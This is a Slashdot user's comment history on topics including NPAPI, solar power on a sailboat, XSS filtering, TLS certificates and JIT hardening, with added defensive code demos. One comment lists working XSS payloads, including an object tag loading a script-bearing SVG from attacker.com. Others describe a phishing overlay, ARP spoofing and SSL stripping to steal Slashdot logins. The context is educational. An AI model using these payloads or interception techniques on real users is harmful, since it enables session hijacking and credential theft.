Comments


Google Chrome Will Block All NPAPI Plugins By Default In January

cbhacking Re:Dropping NPAPI broke VMware consoles on Linux (107 comments)

Stupid and kludgey hack, but is it possible to solve this, at least to a degree, with Wine? Running either the Windows version of Flashplayer (in something like nspluginwrapper; I think I remember hearing about a way to do this though I never tried it) in a Linux browser, or running a full Windows browser (can Wine do that these days?) seems like it solves the problem. It introduces at least one problem, too, of course... but at least you *can* install updates instead of pinning to a version that will only get more outdated...

2 days ago

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

it's a near impossibility to site a solar panel on a sailboat that is entirely shade free for the entire length of the day

That's probably true of a reasonably-sized monohull, but Ocelot is a cat. Setup is 4x 120W Kyocera panels out over the dinghy davits (we have a lot of room back there and it doubles as a shade for the rear of the cockpit). You can read a bit more about them here (photos are outdated in general but we haven't modified the array since they were taken): http://svocelot.com/Ocelot/mod...

Having the panels so far aft and so high provided some protection from salt spray (enough that they don't need cleaning after any but the roughest passages, the kind where the whole boat needs a good rain rinse) and also kept them out of the line of most of our shadows. If the sun sets or rises directly in line with the panels and mast, then yes, we'll lose that panel, but this can often be remedied by running the boom out to one side (tied down with the jibe preventer) and letting the (relatively huge) sail protector swing the boat a few degrees away from pointing dead into the wind. By anywhere close to the hours when the sun is at full power, even our slightly-raked mast just isn't far enough back to shade the panels. (As a side note, it occurs to me that this may explain why the ramp up to full power took longer in the morning than evening; if the easterly winds meant the panels were occasionally shaded in the early morning, we'd only have 3/4 the nominal power production for that much insolation.)

As for angle, that definitely cost us some power - our panels are very much immobile, aside from changing the orientation of the entire boat - but I'm not actually sure how much. Even at 60 degrees off apex, which is pretty late in the day (assuming you're right under the sun's path, within +/- 60 degrees is 1/3 of the day, or 8 hours), you still get 50% of the insolation you would get at apex, atmospheric losses aside. That's certainly significant losses, and it drops off sharply after that, but the middle hours of the day are not severely affected.

By the way, nice site! I'll have to ask my folks if they ever ran into Animation coming up the Aus coast. Alternatively, do you know S/V Vamp? Good friends of ours. I'm sorry you posted as AC but I may ping you by email.

2 days ago

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re:Regular expressions (40 comments)

<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

5 days ago
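
The comparison the comment draws, as an added example (not code from the comment or from WordPress): the six payloads are the comment's own, `blacklistOnce` is an assumed stand-in for the proposed filter, which this page does not show, and `liveVectors` is a rough heuristic written for this demo, not a sanitizer.

```javascript
// Payloads copied from the comment above.
const PAYLOADS = [
  String.raw`<img src="xss" onerror="alert('Nope!')" />`,
  String.raw`<iframe src="javascript:alert('That won't work.')"></iframe>`,
  String.raw`<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>`,
  String.raw`<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>`,
  String.raw`<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>`,
  String.raw`<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>`,
];

// Assumed stand-in for the proposed blacklist: delete every "<script" found.
function blacklistOnce(input) {
  return input.replace(/<script/gi, "");
}

// The "run the filter repeatedly until no further hits occur" variant.
function blacklistUntilStable(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = blacklistOnce(current);
  } while (current !== previous);
  return current;
}

// Output encoding for HTML text and quoted-attribute contexts: every
// character that can open a tag, attribute or entity becomes inert text.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function encodeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Demo heuristic: which script-capable constructs are still live markup?
const VECTORS = [
  ["script element", /<script\b/i],
  ["event-handler attribute", /<[a-z][^>]*\son[a-z]+\s*=/i],
  ["javascript: URL", /<[a-z][^>]*\s(?:src|href|action|data)\s*=\s*["']?\s*javascript:/i],
  ["object/embed element", /<(?:object|embed)\b/i],
];
function liveVectors(markup) {
  return VECTORS.filter(([, re]) => re.test(markup)).map(([name]) => name);
}

// Count how many payloads still carry a live vector after each defense.
function compareDefenses(payloads = PAYLOADS) {
  const survivors = (defense) =>
    payloads.filter((p) => liveVectors(defense(p)).length > 0).length;
  return {
    blacklistOnce: survivors(blacklistOnce),
    blacklistUntilStable: survivors(blacklistUntilStable),
    outputEncoding: survivors(encodeHtml),
  };
}

console.log(compareDefenses());
```
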

Critical XSS Flaws Patched In WordPress and Popular Plug-In

cbhacking Re: Regular expressions (40 comments)

Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

5 days ago

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re:So it was a documentary (235 comments)

Source? Given the extreme cost of any wasted launch mass, I can't imagine they would operate every launch armed. That they have experimented with arming the capsules would be no surprise - I'd be shocked if they hadn't experimented with arming *some* of their spacecraft, even if only unmanned satellites - and they might even have launched armed craft, but I sincerely doubt they've done so on *every* launch.

about a week ago

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re: Forget the Space Station (235 comments)

Not sure if serious, so I'll respond as if you are: nuclear waste does not "explode". The reason it's "waste" is because it no longer is even capable of maintaining a barely critical chain reaction in a moderated reactor core (neutron moderation - slowing them down to the point that they can be captured by other nuclei - is an important part of reactor operation). By itself, it's hot (decay heat) and radioactive (most of the half-lives are really long, so it doesn't actually release a ton of radiation per unit time but it will keep doing it for a long time), but that's about it. Now, it could be reprocessed to remove the low-grade stuff and refine out the actually really useful material. Only about 3% of the potential energy gets extracted from fuel in modern reactors before it drops to the point of being unable to maintain criticality, but with enough work you can purify it and make it usable again. You could, in fact, purify it even more to the point where it will go supercritical *without* a reactor core's moderation - this is one way to make bomb-grade material - but that's difficult, expensive, and never going to happen naturally.

about a week ago

Russia May Be Planning National Space Station To Replace ISS

cbhacking Re:What's it good for? (235 comments)

Oh, that's hardly true. As a random example, SpaceX's Merlin rockets (currently on their 4th revision, not counting the difference between atmospheric and vacuum variants) have the highest thrust-to-weight ratio of any production rocket engine, and they are a very recent design. The Space Shuttle Main Engines have a significantly higher specific impulse (thrust*time per mass of fuel) but the fuel (hydrogen) is so low-density that you need a ton of it to get anywhere, and volume has its own costs (especially in atmosphere). The SSMEs also went through a number of revisions that increased their power and efficiency.

On the other hand, just because SpaceX is busy pushing the bounds of chemical rockets does not, by any means, mean we shouldn't be researching alternate thrust systems... and we are! Not as enthusiastically as I'd like to see, but it's happening. There's research into high-efficiency space drives, alternate launch systems, and even some research into drives which have the capability to make interstellar flight potentially feasible. None of these are close to production, and some of them (especially the ones involving nuclear-powered drives) have been mothballed for years or decades, but even if the test apparatus (for those projects which got so far) no longer exist, the designs and theories and mathematics do, and rocket scientists can and do continue building on those. I'd really like to see practical research start up again on these: http://en.wikipedia.org/wiki/N..., such as this project (which was building and testing actual hardware!) from the 70s: http://en.wikipedia.org/wiki/N...

about a week ago

As Amazon Grows In Seattle, Pay Equity For Women Declines

cbhacking Re:Bullshit Stats. (495 comments)

Do you have any basis for this "hard time believing" or are you just going to ignore evidence in favor of your prejudices?

Don't get me wrong, I was *surprised* by the finding; I live in Seattle, and there is a large population of minorities (blacks, Native Americans, and Hispanics are still very rare in tech, but Indians and various Chinese/Korean/I-can't-tell-by-looking Asian ethnicities are common and I would have guessed they are becoming more common). On the other hand, the rents *are* going up - significantly faster than inflation, in most parts of the city - and that will tend to drive the not-in-tech ethnicities out because they can't command salaries commensurate with the rising cost of living. Seattle has plenty of suburbs (though our relatively awful public transit system means commuting from the suburbs is either very slow or requires a car) and it's not at all inconceivable that the city itself is getting whiter.

Speaking as a cis het white male from a family of above-median income, *you* appear to be (at a minimum) overreacting to the whole "white male guilt" meme, accusing people of "throwing race into the mix" and "stok[ing]" guilt even when citing simple facts. I guess if those facts don't agree with your prejudices then they must be the work of people out to make you feel guilty? Sucks to be you, I guess...

Also, of all the things to critique this study for, you chose them reporting the racial shift? There are far more valid critiques available.

about a week ago

As Amazon Grows In Seattle, Pay Equity For Women Declines

cbhacking Re:Here we go again (495 comments)

Citation on the "legalized drugs" causing a problem? It's not like weed was hard to get before, you just had to buy it from criminals and were a criminal yourself for doing so. Now that this is no longer true, people have less, not more, incentive to commit crimes.

Outlawed firearms: you don't live anywhere near WA, do you? The state rate of concealed carry is quite high, especially for a "blue" state. People raise a fuss about it sometimes, but overall there's still a good number of guns around.

about a week ago

Jolla Crowdfunds Its First Tablet

cbhacking Re:Battery capacity (56 comments)

This makes me wonder how well battery-optimized Sailfish is (and its apps are). I never owned an N900 or N9, or used one for long enough to get a really good feel for the battery life, but even when new, the N800 could not last even the waking hours of a day. That's assuming I used it similar to how I use the smartphone I got a couple years later (which would last well into a second day, and which - unlike the N800 - has a cellular radio chip).

Anyhow, my point is that most Maemo (N800 OS) apps were really poorly optimized for battery life - not surprisingly, all things considered - and the multitasking model of the OS just compounded the problem unless you were obsessive about closing stuff that you didn't need to have in the background. So, when I hear that a new tablet based on a descendant of Maemo has 2/3 the battery capacity of its competitors, I get concerned. There are mobile OSes that could probably get by with capacity like that, but Maemo was emphatically not one of them. On the other hand, six years is a long time; maybe they've fixed all that now and Sailfish *is* one of the more efficient OSes. If it has true, "desktop-style" multitasking, though, I doubt it.

about a week ago

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:The TripAdvisor URL (306 comments)

Thanks! Already commented or would mod you up.

Somehow, the place is ranked 858th of 894. Considering that their reviews (going back months) are mostly terrible - it's not just the recent wave of them, and the photos are damning - plus the recent wave of awful reviews in the wake of this news breaking, I have to wonder how there are 36 hotels that are ranked even *worse*...

about a week ago

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Ask the credit card for a refund (306 comments)

Yep. One of the few times I issued a chargeback (HP laptop repair by manufacturer due to a non-functional video card; the service request explicitly did not include the hard drive but they took it out, (supposedly) destroyed it, and replaced it with an OEM imaged one; fortunately it was a dual-drive laptop and all my data was on the second drive which I'd removed prior to sending it in) the vendor (HP) tried to contest it. After an annoying phone call with my CC company (Visa through Wells Fargo, which I do not recommend) I faxed them the repair order (clearly stating not to touch the HDD), repair receipt (which clearly stated what they'd done to the HDD), and a printout of the IM transcript where their service agent had assured me they wouldn't touch the hard drive. Not *quite* the only time I've had to send a fax in the last ten years, but close.

Anyhow, got the charge for the service reversed, but I did have to prove they had failed to uphold their service agreement to the terms that I'd paid for.

Incidentally, this was after going through numerous complaints with the service center itself (where they used the laughable argument of an analogy to car repair). I had recently had a significant amount of car repair, which by law includes a very detailed statement of what things are and are not to be replaced, itemized costs, and a stipulation that all replaced parts must be available for return to the owner (i.e. no destroying them without the owner explicitly asking you to). I also filed a report with the BBB. This is all from back in 2008 though, and the laptop actually still works so I have no other significant complaint about HP.

about a week ago

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Could be solved be VISA, etc. immediately (306 comments)

Ah, I didn't realize. I assume they're still used for major transactions like buying a car or something?

I live in the USA, but aside from rent and occasionally paying a friend for something expensive I haven't used a check since graduation except to pay rent and buy my car.

about a week ago

Rooftop Solar Could Reach Price Parity In the US By 2016

cbhacking Re:cost/price per kW hour comparison is nonsense (516 comments)

Speaking as somebody who has spent year living on a sailboat where electricity was entirely provided by solar:

Even within a few miles of the equator, at local noon, a good rain squall will drop PV production to under 20% of its normal amount at that time. Later (or earlier) in the day it can easily drop all the way to effective zero - the charge controller eats a bit - until the sky clears. Of course, on the tropical ocean, "until the sky clears" is usually not that long. We (well, "they" now; my parents still live aboard but I do not) can run for a couple days (if fully charged) just living off the battery bank, though that would drop its charge lower than we like to let it go. On a really rainy day we might only get about 1/4 the normal production; if that keeps up for three days or so we'll run the engine for an hour to juice the batteries up.

As for winter, the biggest problem is not the angle of the sun (that is *a* problem, even if you tilt the panels, because of atmospheric losses... but it's not a huge problem) but instead is the length of the day. You might get 80% of summer noon on a sunny winter noon in some places (I doubt it would be true up here in the Pacific Northwet, and no, that's not a typo), but the boat has never been anywhere that *has* a "winter" so I can't speak from experience. However, on an average tropical Caribbean day, I measured meaningful power from 7:30 AM to 5:30 PM (10 hours total), with peak output around 1PM. That's only ten hours of electricity generation, and the vast majority of it occurred between 9:30 AM and 4 PM, for a period of only 6.5 hours (call it 2/3 of the day) where the panels produced more than 50% of their typical mid-day maximum. In Seattle in the middle of winter, we don't even get close to 10 hours of daylight; I wouldn't be surprised if we didn't get more than 6.5 hours of usable light at all. So, 2/3 as much time, multiply by 4/5 for lost brightness even at midday, and you're looking at barely over half the power per day in winter that you get from peak summer brightness. Take into account the fact that tropical days are shorter than summer days, and it looks even worse for a comparison of winter vs. summer.

about a week ago

UK Hotel Adds Hefty Charge For Bad Reviews Online

cbhacking Re:Could be solved be VISA, etc. immediately (306 comments)

Checks (cheques, this being a British hotel) do still exist, but yeah, that would still be pretty much a death knell. The only time I don't pay for a hotel online (with my credit card) is if I'm in a place so remote I either don't get cell signal or they aren't listed on the online booking sites. Even in most of those places, though, I pay with my card. The only time in the last decade I've paid cash for lodging was a few "tea houses" in the Himalayas, most of which didn't even have electricity (maybe one solar panel, battery, and a light over the kitchen/dining area).

about a week ago

Launching 2015: a New Certificate Authority To Encrypt the Entire Web

cbhacking Re:Why do this (free, easy SSL certificates)? (210 comments)

A) WTF do you mean, "nearly worthless"? It'll mean what it does today: the connection is secured using SSL/TLS. Nothing more and nothing less. HTTPS isn't some special indication that a site is Serious Business or something. It just means that an eavesdropper can't listen in on the connection or intercept the traffic. If you *REALLY* think there's value in that distinction, though, Extended Validation certs (green URL bar) will still exist to take money from people like you.
B) Vaguely possible, but not something I'm really worried about. If their server is so insecure that the data they send is easily exposed, then they probably wouldn't have cared about what data they were or were not sending in the first place. Besides, that's *still* better than having *all* the data (including authentication data) be sent in plain text!
C) Bullshit. There are many ways around that. The easy (obvious, to anybody who knows anything about the subject) one is to fake up your own CA, install its certificate, and use a proxy server that serves up faked certs signed by your faked up CA. Burp Suite and Fiddler (two common web proxy tools, the first of which is explicitly intended for web security testing) already support doing this and have supported it for years.

i) How do you think it'll do that? The technique these people are using to authenticate domain ownership is better than what some existing "trusted" CAs use...
ii) Cry me a fucking river. The world will not miss them.
iii) See previous points, including the ones that express "WTF are you talking about?".

Authority: I've been in the information security and penetration testing profession, including lots of tests of web apps, web services, and mobile apps, since 2006.

about a week ago

Launching 2015: a New Certificate Authority To Encrypt the Entire Web

cbhacking Re:So how much power will this use? (210 comments)

Actually, there's a pretty damn good reason why Slashdot *should* be private:

You (and I) are logged into this site. That means a unique identifier tied to our Slashdot accounts is sent to the server (in a cookie) with every request we make. This lets Slashdot know who we are, primarily for when we post a comment. The problem is, this unique identifier is sent in plain text; anybody on the same network as you or anywhere in the network between you and Slashdot's servers can see it.

Now, I don't know about you, but it's not *that* hard to get from my Slashdot identity to my real name. I assume everything I post here can be traced back to me. I'm OK with that; if I wanted to post something privately (and for some reason didn't want to post AC) I'd create and use a throwaway account, possibly via TOR + an additional proxy redirect at an Internet café or something (Slashdot blocks known TOR exit nodes, if I recall correctly). However, just because I'm OK with the posts I make being traceable to me does *not* mean I'm OK with just anybody who wants to posting in my name.

Right now, if you and I were on the same local network (wireless or wired), I could use techniques such as ARP spoofing or DNS poisoning to intercept every HTTP request you send to Slashdot, and every response it sends you. I could extract your authentication cookie and use it to make requests that Slashdot would think come from you and would post under your username. I could even have an excellent chance to steal your password; all I would have to do is modify Slashdot's responses to make it look like you aren't signed in. Then, when you go to the login page (which normally sends your password via HTTPS, but is itself served over HTTP), I use a technique called SSL Stripping to modify the login form so that it submits your password over plain-text HTTP (I could then submit that password to Slashdot over HTTPS, as it expects). Now I have your username and password, I can modify your account, I can post as you, and odds are you don't even know you were compromised.

None of that even requires any special skill, not even basic coding. The tools to do it all are pre-built and available for free download.

about a week ago

Ubisoft Points Finger At AMD For Assassin's Creed Unity Poor Performance

cbhacking Re:If at first you don't succeed... (262 comments)

Well, or you could STOP BUYING DRM SHIT instead, too. If Steam can take away your game library (and they can, and sometimes will) then they're DRM and they're shit, plain and simple. I do not get all this fawning over Steam that I see from so many people in what's normally a very anti-DRM community.

about two weeks ago

Ubisoft Points Finger At AMD For Assassin's Creed Unity Poor Performance

cbhacking Re:If at first you don't succeed... (262 comments)

This is why I don't drop a lot of money on a game unless I've been able to trial it. Not pirate it, just trial it. There are, in fact, game devs that release trials of their games.

Most single-player RPGs and adventure games do not, which is kind of odd because it should be pretty easy to figure out a point (in either time or game progression) where if the player is enjoying the game they'll be hooked but which still leaves lots of content. Conversely, damn near all MMOs do offer such a trial, typically with a level cap and/or time cap. While I'm well aware of the differences between MMOs and single-player games, I don't understand why the big devs are so aware of the "get them hooked and they'll pay up" system for MMOs but don't take the obvious adaptation for single-player games.

Well, unless they know their games are shit and don't want people to know that before they buy. But that still doesn't justify pirating the game, just watch other people play (friends or reviewers), or borrow from a friend if possible.

about two weeks ago

Popular Smartphones Hacked At Mobile Pwn2Own 2014

cbhacking Re:Apple (52 comments)

No, PC browsers (with the possible exception of Safari?) don't do anything nearly so braindead, nor do any of the other kinds of PC software that use a JIT (a few examples: Java, .NET, Flash). You allocate the memory, with pages mapped R/W. You emit JIT-compiled code into a page. You re-map the page to R/X! Repeat as more pages are needed. You never, ever have a R/W/X page.

In fact, browsers (IE and Chrome at a minimum, probably others) and Flashplayer take things a step further. Since you can generate a huge number of almost-entirely-attacker-controlled instructions by doing operations that will compile down as arithmetic on immediate values (constants), and since x86 (and, to a lesser extent, many ARM systems courtesy of THUMB-2 mode) allows code to be interpreted as a completely different instruction sequence if you enter the binary stream in the middle of an instruction, one technique for getting executable-mapped shellcode into a browser is to have a script that does a ton of arithmetic on carefully chosen constants. Therefore, the above-mentioned JITs (IE, Chrome, Flashplayer, maybe others) use a technique called "constant blinding" where every constant operation is actually emitted as two instructions: a masked constant getting XORed with its mask value to produce the expected constant (in a register), and then an operation on that value. No long sequence of known instructions with attacker-controlled immediates means no way to predict the result of entering an instruction stream at an offset.

If Safari on iOS really is so stupid as to have R/W/X pages just because of its JIT, Apple has fucked up colossally.

about two weeks ago
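
A toy model of the constant blinding described in the comment above, added here as an illustration and not taken from any browser's JIT: the emitter, the three marker constants and the fixed masks are constructed for the example, and a real JIT would draw a fresh unpredictable mask for every constant.

```javascript
// Models only the bytes a 32-bit x86 JIT would write for "eax += c".

function le32(value) {
  const v = value >>> 0;
  return [v & 0xff, (v >>> 8) & 0xff, (v >>> 16) & 0xff, (v >>> 24) & 0xff];
}

// Unblinded: ADD EAX, imm32 (05 id). The script's constant lands verbatim
// in executable memory, four bytes out of every five.
function emitPlain(constants) {
  const out = [];
  for (const c of constants) out.push(0x05, ...le32(c));
  return Uint8Array.from(out);
}

// Blinded: MOV ECX, c^mask (B9 id); XOR ECX, mask (81 F1 id); ADD EAX, ECX (01 C8).
// Neither immediate is predictable without knowing the mask.
function emitBlinded(constants, nextMask) {
  const out = [];
  for (const c of constants) {
    const mask = nextMask() >>> 0;
    out.push(0xb9, ...le32((c ^ mask) >>> 0));
    out.push(0x81, 0xf1, ...le32(mask));
    out.push(0x01, 0xc8);
  }
  return Uint8Array.from(out);
}

// Interpreter for exactly the four encodings above, used to confirm that
// blinding leaves the computed result unchanged.
function execute(code) {
  let eax = 0, ecx = 0, i = 0;
  const imm = (at) =>
    (code[at] | (code[at + 1] << 8) | (code[at + 2] << 16) | (code[at + 3] << 24)) >>> 0;
  while (i < code.length) {
    if (code[i] === 0x05) { eax = (eax + imm(i + 1)) >>> 0; i += 5; }
    else if (code[i] === 0xb9) { ecx = imm(i + 1); i += 5; }
    else if (code[i] === 0x81 && code[i + 1] === 0xf1) { ecx = (ecx ^ imm(i + 2)) >>> 0; i += 6; }
    else if (code[i] === 0x01 && code[i + 1] === 0xc8) { eax = (eax + ecx) >>> 0; i += 2; }
    else throw new Error("unexpected byte at offset " + i);
  }
  return eax;
}

// How many times does a script-chosen 4-byte pattern appear in the stream?
function countOccurrences(stream, needle) {
  let hits = 0;
  for (let i = 0; i + needle.length <= stream.length; i++) {
    if (needle.every((b, j) => stream[i + j] === b)) hits++;
  }
  return hits;
}

// Constructed marker constants standing in for script-supplied immediates.
const CONSTANTS = [0x11223344, 0x55667788, 0x99aabbcc];
// Constructed fixed masks so the demo is repeatable; a real JIT uses a CSPRNG.
const SAMPLE_MASKS = [0xa5c31f07, 0x3be2904d, 0xd10c76e9];

function demo() {
  let next = 0;
  const plain = emitPlain(CONSTANTS);
  const blinded = emitBlinded(CONSTANTS, () => SAMPLE_MASKS[next++]);
  const hitsIn = (stream) =>
    CONSTANTS.reduce((n, c) => n + countOccurrences(stream, le32(c)), 0);
  return {
    plainBytes: plain.length,
    blindedBytes: blinded.length,
    chosenPatternsInPlain: hitsIn(plain),
    chosenPatternsInBlinded: hitsIn(blinded),
    plainResult: execute(plain),
    blindedResult: execute(blinded),
  };
}

console.log(demo());
```

The blinded stream is longer (13 bytes per constant instead of 5), which is the code-size cost paid for removing script-chosen byte runs from executable pages.
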

Submissions


Microsoft allowing WP8 users to get updates directly

cbhacking cbhacking writes  |  about a year ago

cbhacking (979169) writes "In June of 2012, Microsoft announced that they would be providing a system whereby "registered [Windows Phone] enthusiasts get early access to updates" without waiting for carrier approval and broad distribution. For more than a year, that has been an unfulfilled promise, and for many users, updates have been delayed or may even still be unavailable. Today, coinciding with the release of WP8 Update 3 (a.k.a. GDR3), Microsoft is allowing "developers" (anybody who has enabled app sideloading on their phone) to opt into a "Windows Phone Preview" program to allow updating immediately.

Like the update itself, this is likely a move in response to consumer demand and comparisons to iOS and Android, as there is little in the update which specifically interests developers. However, the program does warn that participation may invalidate your device's warranty; this may have been required by the carriers to relieve concerns of high support costs in the event of a botched update. While only the Microsoft portion of the updates (as opposed to driver firmware or OEM customizations) are available through this program, participating phones will also continue to receive public updates as they are rolled out."

Zune 3.0: Wireless Purchase, Games, 16GB

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "Microsoft released the Zune 3.0 yesterday. The device firmware has been immensely upgraded: it now supports connecting to wireless access points, sampling and purchasing music through a built-in store interface, playing games, and several other new things. You can read Microsoft's blurb on what's new at zune.net.

The Windows software has also been improved, better integrating the social features.

Additionally, zunes are now available in more colors, the 4GB flash player is being discontinued for a 16GB player, and there's now a HDD-based 120GB model."


CrossOver Games released for Linux, OS X

cbhacking cbhacking writes  |  more than 6 years ago

cbhacking writes "CodeWeavers, the company that supports the open-source Wine project that allows running Windows applications on UNIX-like operating systems, has released CrossOver Games for Linux and OS X. The launch includes a considerable list of supported titles, including such popular (and graphically intensive) games as EVE Online, Counterstrike: Source (and other Steam games), and World of WarCraft.

A trial version is also available for download."


Microsoft .NET source to be available for viewing

cbhacking cbhacking writes  |  about 7 years ago

cbhacking writes "A post on the blog of Microsoft's Scott Guthrie has some exciting news for .NET developers: with the release of Visual Studio 2008 later this year, the .NET Framework 3.5 source code will be released for reference purposes. Most of the libraries, including System.Runtime, System.Security, System.Windows.Forms, and System.Web will be made available with the release of VS2008, with some additional non-core libraries coming later. The code will be available for either standalone download and viewing, or as debugging symbols with associated source for integrated debugging with VS2008.

There's a catch though: although the license abbreviation used in the post, MS-RL, usually refers to the copyleft and OSI-approved Microsoft Reciprocal License (which allows modification and redistribution), the license actually explicitly mentioned and linked to is the Microsoft Reference License, which prohibits modification or redistribution. Although an open-source release of the code would be great, this is still likely to be very helpful for debugging, examining behavior of the libraries, and selecting the correct methods or algorithms for a given situation."

Iraq Whistleblower Imprisoned, Tortured

cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Forbes.com has a telling story on the fraud and corruption that has plagued the Iraqi reconstruction efforts and, more frighteningly, the harsh penalties faced by whistleblowers. Many have been vilified, demoted, or fired outright. Now, the story has come out of Navy veteran Donald Vance, who was working as a civilian in an Iraqi company. After reporting to the FBI that his company was making illegal sales of military weapons to customers ranging from State Department workers to Iraqi insurgents, Vance was held without a trial for 97 days in Camp Cropper, an American military prison outside Baghdad. During his time there, he was subjected to "that head-banging music blaring dawn to dusk and interrogators yelling the same questions over and over."

Vance is now back in the USA and, along with a colleague who helped him gather evidence and was treated similarly in return, has filed a federal lawsuit alleging they were illegally imprisoned and subjected to physical and mental interrogation tactics "reserved for terrorists and so-called enemy combatants.""


cbhacking cbhacking writes  |  more than 7 years ago

cbhacking writes "Previously, searching for 'Powertoy Vista' has been a quick road to failure. However, Brandon Paddock, a MS developer, has independently produced and is maintaining a very handy tool called Search++ that adds all kinds of capabilities to the built-in desktop search.
Some of the standard features are things like typing 'g <search string>' to launch a Google search, or 'play[artist|album] <name>' to find and start playing music. Another, very nice for those of us who start almost all programs in Vista from the Start menu, is the ability to start programs with elevated permissions via 'sudo <Program>'.
The basic features are great and very easy to use, but Start++ is also extensible and user-modifiable. You can even import additional search tools (called 'Startlets'), and export your own Startlets.
You can download Search++ and additional Startlets here."

cbhacking cbhacking writes  |  about 8 years ago

cbhacking writes "ABC News has a well-written review of the latest version of the Microsoft Office suite, which has been shipped to manufacturers. Representing the first major upgrade since 2003, Office 2007 has an incredible and instantly visible collection of new features, including an innovative new interface. For those who downloaded the public beta (all ~5 million of us), Office 2007 has already shown itself to be an amazing software suite.

The review includes overall impressions of the new version, plus ratings of the most common individual apps. It is mostly positive, from the easy learning curve for the new interface and the capabilities it offers, to the number of things Microsoft finally got RIGHT, to the good migration tools.

In addition to the many tools and tips the review mentions, I would add the ability of Word to (via plugins) read/write ODF and to export to PDF and Microsoft's new XPS format."

cbhacking cbhacking writes  |  about 8 years ago

cbhacking writes "The Pentagon is currently considering options for developing "the ability to strike targets around the world within an hour." According to Space.com, there are several main options being considered: an "Advanced Hypersonic Weapon", placing weapon payloads on small space launch vehicles, fitting missile submarines with a new design of ballistic missile with a conventional payload, or placing conventional warheads on the (traditionally nuclear) Trident missiles our subs currently carry.

Aside from the coolness factor of an autonomous hypersonic vehicle which achieves suborbital altitudes but for the most part flies towards its target like an aircraft, the main advantage of the Advanced Hypersonic Weapon seems to be that it wouldn't be confused with a nuclear launch. Several prominent people, including Ted "Series of Tubes" Stevens, have suggested that using Trident missiles would be dangerous as it may cause other countries to believe we are launching nuclear warheads at them. However, it appears to be the option involving the least re-invention of the wheel, and could be operational "before the end of this decade."

The option of weaponizing space launch vehicles seems to already be facing significant opposition. The Advanced Hypersonic Weapon is receiving some funding, but re-arming the Tridents is out at least until completion of a report on — among other things — the military and political issues.

Is it just me, or aren't there any major reasons the other weapons couldn't be equipped with nuclear warheads anyhow? Do we actually need a different weapon for everything?"

cbhacking cbhacking writes  |  more than 8 years ago

cbhacking writes "The Windows Vista Team has posted a blog about the "Express Upgrade" program. Basically, if you buy a new computer with XP, Microsoft will make the upgrade to Vista available for a relatively low price.

The edition(s) you can upgrade to through this offer vary by what edition of XP you have. For example, Media Center will upgrade to Vista Home Premium, and Professional or Tablet to Vista Business, for a nominal cost. XP Home can be upgraded to either Vista Home Basic or Premium, for a 50% discount off the normal upgrade pricing. Enterprise and Ultimate are not offered in this list. Note that the upgrade versions of Vista will already cost less than the full retail versions; this program reduces the cost further for people who purchase a PC just before Vista comes out (or shortly thereafter).

It seems that very few people actually upgrade the OS; they simply buy a new computer with the new version. Maybe this program will increase the Vista install base in its first few months?"

Journals


Another major music store offers unrestricted MP3s

cbhacking cbhacking writes  |  more than 7 years ago

When I started the RealNetworks Rhapsody software this morning, I discovered a cause for some celebration by anybody who supports DRM-free music purchases: the Rhapsody store is now offering some unrestricted MP3 downloads. At present only about 5000 albums (roughly 50000 songs) are available, but that is just an initial offer - I haven't even found an announcement anywhere - and they claim to be working to increase the number of MP3 tracks available.

